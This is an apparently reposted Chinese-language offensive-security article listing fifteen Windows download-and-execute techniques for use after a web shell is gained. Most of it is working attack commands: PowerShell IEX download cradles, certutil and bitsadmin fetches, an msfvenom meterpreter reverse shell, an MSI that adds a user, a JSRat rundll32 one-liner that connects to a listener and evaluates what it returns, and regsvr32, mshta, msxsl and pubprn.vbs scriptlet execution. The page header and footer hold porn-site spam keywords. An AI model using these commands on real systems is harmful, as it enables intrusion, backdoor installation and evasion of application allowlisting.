成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

Windows文件下載執行的15種姿勢

系統 Windows
當我們通過Web滲透獲取了一個Shell,而且目標主機是Windows,我們該怎么去下載后門文件到目標主機上執行呢?

[[325235]]

 本文轉載自微信公眾號「Bypass」,轉載本文請聯系Bypass公眾號。

當我們通過Web滲透獲取了一個Shell,而且目標主機是Windows,我們該怎么去下載后門文件到目標主機上執行呢?

一般來說,實現Windows文件下載執行的方式不外乎以下幾種方式。第一種,遠程下載文件到本地,然后再執行;第二種,遠程下載執行,執行過程沒有二進制文件落地,這種方式已然成為后門文件下載執行的首要方式。另外呢,只要你所在服務器的環境支持,你也可以通過任何一門語言來實現它,這種方式暫不在本文的討論范圍之內。

在這里,本文收集了15種常見的文件下載執行的方式,并結合具體案例,讓我們一起來看看是怎么實現的吧。

  • PowerShell
  • Bitsadmin
  • certutil
  • wget
  • ipc$文件共享
  • FTP
  • TFTP
  • WinScp
  • msiexec
  • IEExec
  • mshta
  • rundll32
  • regsvr32
  • MSXSL.EXE
  • pubprn.vbs

1、PowerShell

PowerShell是一種命令行外殼程序和腳本環境,使命令行用戶和腳本編寫者可以利用。

遠程下載文件保存在本地:

  1. powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.28.128/imag/evil.txt','evil.exe'

遠程執行命令:

  1. powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.28.128/imag/evil.txt'))" 

2、Bitsadmin

bitsadmin是一個命令行工具,可用于創建下載或上傳工作和監測其進展情況。

  1. bitsadmin /transfer n http://192.168.28.128/imag/evil.txt d:\test\1.txt 

輸入以上命令,成功下載文件。

 

3、certutil

用于備份證書服務,支持xp-win10都支持。由于certutil下載文件都會留下緩存,所以一般都建議下載完文件后對緩存進行刪除。

注:緩存目錄為:

  1. ”%USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content” 
  1. #下載文件 
  2. certutil -urlcache -split -f http://192.168.28.128/imag/evil.txt test.php 
  3. #刪除緩存 
  4. certutil -urlcache -split -f http://192.168.28.128/imag/evil.txt delete 

 

4、wget

Windows環境下,可上傳免安裝的可執行程序wget.exe到目標機器,使用wget下載文件。

wget.exe下載:https://eternallybored.org/misc/wget/

  1. wget -O "evil.txt" http://192.168.28.128/imag/evil.txt 

 

5、ipc$文件共享

IPC$(Internet Process Connection)是共享”命名管道”的資源,它是為了讓進程間通信而開放的命名管道,通過提供可信任的用戶名和口令,連接雙方可以建立安全的通道并以此通道進行加密數據的交換,從而實現對遠程計算機的訪問。

  1. #建立遠程IPC連接 
  2. net use \\192.168.28.128\ipc$ /user:administrator "abc123!" 
  3. #復制遠程文件到本地主機 
  4. copy \\192.168.28.128\c$\2.txt D:\test 

 

6、FTP

一般情況下攻擊者使用FTP上傳文件需要很多交互的步驟,下面這個 bash腳本,考慮到了交互的情況,可以直接執行并不會產生交互動作。

  1. ftp 127.0.0.1 
  2. username 
  3. password 
  4. get file 
  5. exit 

 

7、TFTP

用來下載遠程文件的最簡單的網絡協議,它基于UDP協議而實現

tftp32服務端下載地址:http://tftpd32.jounin.net/tftpd32_download.html

  1. tftp -i 你的IP get 要下載文件 存放位置 

 

8、WinScp

WinSCP是一個Windows環境下使用SSH的開源圖形化SFTP客戶端。

  1. #上傳 
  2. winscp.exe /console /command "option batch continue" "option confirm off" "open sftp://bypass:abc123!@192.168.28.131:22" "option transfer binary" "put D:\1.txt  /tmp/" "exit" /log=log_file.txt  
  3. #下載 
  4. winscp.exe /console /command "option batch continue" "option confirm off" "open sftp://bypass:abc123!@192.168.28.131:22" "option transfer binary" "get /tmp D:\test\app\" "exit" /log=log_file.tx 

使用winscp.exe 作為命令行參數執行遠程上傳/下載操作。

 

9、msiexec

msiexec 支持遠程下載功能,將msi文件上傳到服務器,通過如下命令遠程執行:

  1. #生成msi包 
  2. msfvenom -p windows/exec CMD='net user test abc123! /add' -f msi > evil.msi 
  3. #遠程執行 
  4. msiexec /q /i http://192.168.28.128/evil.msi 

成功添加了一個test用戶:

 

10、IEExec

IEexec.exe應用程序是.NET Framework附帶程序,存在于多個系統白名單內。

生成Payload:

  1. msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.28.131 lport=4444 -f exe -o evil.exe 

使用管理員身份打開cmd,分別運行下面兩條命令。

  1. C:\Windows\Microsoft.NET\Framework64\v2.0.50727>caspol.exe -s off 
  2. C:\Windows\Microsoft.NET\Framework64\v2.0.50727>IEExec.exe http://192.168.28.131/evil.exe 

 

11、mshta

mshta用于執行.hta文件,而hta是HTML Applocation 的縮寫,也就是HTML應用程序。而hta中也支持VBS。所以我們可以利用hta來下載文件。

  1. mshta http://192.168.28.128/run.hta 

run.hta內容如下:

  1. <HTML>  
  2. <meta http-equiv="Content-Type" content="text/html; charset=utf-8"
  3. <HEAD>  
  4. <script language="VBScript"
  5. Window.ReSizeTo 0, 0 
  6. Window.moveTo -2000,-2000 
  7. Set objShell = CreateObject("Wscript.Shell"
  8. objShell.Run "cmd.exe /c net user test password /add" // 這里填寫命令 
  9. self.close 
  10. </script> 
  11. <body> 
  12. demo 
  13. </body> 
  14. </HEAD>  
  15. </HTML> 

 

12、rundll32

其實還是依賴于WScript.shell這個組件,在這里我們使用JSRat來做演示,JSRat是一個命令和控制框架,僅為rundll32.exe和regsvr32.exe生成惡意程序。

項目地址:

  1. https://github.com/Hood3dRob1n/JSRat-Py.git 

步驟一:開始運行JSRat,監聽本地8888端口。

 

步驟二:通過url訪問,可以查看惡意代碼。

 

復制代碼如下:

  1. rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.28.131:8888/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} 

步驟三:在受害者PC運行該代碼,將成功返回一個會話,如下圖所示:

 

13、regsvr32

Regsvr32命令用于注冊COM組件,是Windows系統提供的用來向系統注冊控件或者卸載控件的命令,以命令行方式運行

在目標機上執行:

  1. regsvr32.exe /u /n /s /i:http://192.168.28.131:8888/file.sct scrobj.dll 

可以通過自己構造.sct文件,去下載執行我們的程序

  1. <?XML version="1.0"?> 
  2. <scriptlet> 
  3. <registration 
  4.     progid="ShortJSRAT" 
  5.     classid="{10001111-0000-0000-0000-0000FEEDACDC}" > 
  6.     <script language="JScript"
  7.         <![CDATA[ 
  8.             ps  = "cmd.exe /c calc.exe"
  9.             new ActiveXObject("WScript.Shell").Run(ps,0,true); 
  10.         ]]> 
  11. </script> 
  12. </registration> 
  13. </scriptlet> 

執行命令,成功彈計算器:

 

14、MSXSL.EXE

msxsl.exe是微軟用于命令行下處理XSL的一個程序,所以通過他,我們可以執行JavaScript進而執行系統命令。

下載地址為:

  1. https://www.microsoft.com/en-us/download/details.aspx?id=21714 

msxsl.exe 需要接受兩個文件,XML及XSL文件,可以遠程加載,具體方式如下:

msxsl http://192.168.28.128/scripts/demo.xml http://192.168.28.128/scripts/exec.xsl

demo.xml

  1. <?xml version="1.0"?> 
  2. <?xml-stylesheet type="text/xsl" href="exec.xsl" ?> 
  3. <customers> 
  4. <customer> 
  5. <name>Microsoft</name
  6. </customer> 
  7. </customers> 

exec.xsl

  1. <?xml version='1.0'?> 
  2. <xsl:stylesheet version="1.0" 
  3. xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 
  4. xmlns:msxsl="urn:schemas-microsoft-com:xslt" 
  5. xmlns:user="http://mycompany.com/mynamespace"
  6.  
  7. <msxsl:script language="JScript" implements-prefix="user"
  8.    function xml(nodelist) { 
  9. var r = new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe"); 
  10.    return nodelist.nextNode().xml; 
  11.  
  12.    } 
  13. </msxsl:script> 
  14. <xsl:template match="/"
  15.    <xsl:value-of select="user:xml(.)"/> 
  16. </xsl:template> 
  17. </xsl:stylesheet> 

 

15、pubprn.vbs

在Windows 7以上版本存在一個名為PubPrn.vbs的微軟已簽名WSH腳本,其位于C:\Windows\System32\Printing_Admin_Scripts\en-US,仔細觀察該腳本可以發現其顯然是由用戶提供輸入(通過命令行參數),之后再將參數傳遞給GetObject()

  1. "C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs" 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct 

test.sct

  1. <?XML version="1.0"?> 
  2. <scriptlet> 
  3. <registration 
  4.     description="Bandit" 
  5.     progid="Bandit" 
  6.     version="1.00" 
  7.     classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" 
  8.     remotable="true" 
  9.     > 
  10. </registration> 
  11. <script language="JScript"
  12. <![CDATA[ 
  13.         var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); 
  14. ]]> 
  15. </script> 
  16. </scriptlet> 

 


 

 

責任編輯:武曉燕 來源: Bypass
相關推薦

2025-06-10 10:10:00

文件下載前端開發

2020-12-09 10:15:34

Pythonweb代碼

2020-12-23 10:10:23

Pythonweb代碼

2022-07-07 10:33:27

Python姿勢代碼

2022-06-22 09:44:41

Python文件代碼

2015-08-03 17:28:04

Windows 10安裝

2022-02-18 11:26:23

日志程序Linux

2021-04-20 11:25:38

Linux命令文件

2021-01-13 08:14:36

Windows提權漏洞攻擊

2020-08-05 08:30:25

Spring BootJavaSE代碼

2010-08-10 13:31:37

2019-08-19 14:47:28

數據庫軟件技術

2022-07-11 06:48:25

Windows 11微軟

2020-06-18 08:18:35

密碼加密安全

2022-09-02 08:24:07

前端通用數據特定數據

2022-07-26 06:23:04

搭建前端監控前端應用

2025-01-02 09:23:05

2021-03-10 10:05:59

網絡釣魚攻擊黑客

2023-12-18 08:36:39

消息隊列微服務開發

2021-01-12 11:31:09

數據科學數據大數據
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: www.亚洲成人网 | 欧美综合一区二区三区 | 欧美日韩在线免费观看 | 成人不卡 | 欧美www在线观看 | 久久久九九九九 | 国产视频福利一区 | 91麻豆久久久 | 9色网站| 美女视频黄的 | 午夜亚洲| 欧美视频成人 | 国产精品久久久久久久午夜 | 日韩一级电影免费观看 | 亚洲精品视频在线观看视频 | 91精品国产综合久久久久久 | 久久久久久高潮国产精品视 | 成人免费视频一区 | 成年免费大片黄在线观看一级 | 国产男女视频 | 国产成人高清成人av片在线看 | 国产免费xxx | 精品日韩一区二区 | 欧美久久一区二区三区 | 亚洲精品福利视频 | 黑人巨大精品欧美一区二区免费 | 午夜免费看视频 | 5060网一级毛片 | 久久久高清 | 久久99精品国产 | 久久噜噜噜精品国产亚洲综合 | 中文字幕在线观看视频一区 | 精品国产乱码久久久久久88av | 性欧美xxxx| 日韩手机在线视频 | 久久久精彩视频 | 一区二区三区在线 | 国产精品成人一区 | 久久最新精品 | 亚洲午夜精品一区二区三区他趣 | 国产一区 在线视频 |